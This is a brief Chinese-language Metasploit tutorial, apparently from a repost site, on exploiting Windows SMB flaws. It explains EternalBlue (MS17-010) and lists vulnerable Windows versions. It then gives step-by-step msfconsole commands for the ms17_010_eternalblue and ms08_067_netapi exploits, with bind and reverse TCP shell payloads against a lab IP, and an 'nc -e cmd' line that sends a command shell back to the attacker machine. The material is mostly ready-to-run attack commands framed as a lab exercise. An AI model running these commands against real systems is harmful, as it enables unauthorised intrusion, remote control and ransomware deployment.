1. 永恒之藍Eternalblue 攻擊

Eternalblue 通過TCP端口445和139來利用SMBv1和NBT中的遠程代碼執行漏洞

惡意代碼會掃描開放445文件共享端口的Windows機器，無需用戶任何操作，只要開機上網，不法分子就能在電腦和服務器中植入勒索軟件、遠程控制木馬、虛擬貨幣挖礦機等惡意程序。

模擬漏洞的機器類型:

Windows XP (all services pack) (x86) (x64)

Windows Server 2003 SP1/SP2 (x86)

Windows Server 2003 (x64)

Windows Server 2008 (x86)

Windows Server 2008 R2 (x86) (x64)

Windows 7 (all services pack) (x86) (x64)

2.使用msf攻擊msf5 auxiliary(scanner/portscan/syn) > use exploit/windows/smb/ms17_010_eternalblue

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.116.130

rhost => 192.168.116.130? (目標機為英文版Windows Server 2003 (x64))

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

3. 緩沖區溢出攻擊(正向攻擊)msf5 > use exploit/windows/smb/ms08_067_netapi

msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell/bind_tcp

msf5 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 192.168.116.130

msf5 exploit(windows/smb/ms08_067_netapi) > run

4. 緩沖區溢出攻擊(反向鏈接攻擊)msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell/reverse_tcp

msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.116.128

msf5 exploit(windows/smb/ms08_067_netapi) > run

在目標機運行nc -vn -e cmd 192.168.116.128 4444

回到攻擊機輸入pwd

總結

以上是生活随笔為你收集整理的利用永恒之蓝入侵服务器复制文件,msf利用永恒之蓝进行漏洞攻击的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。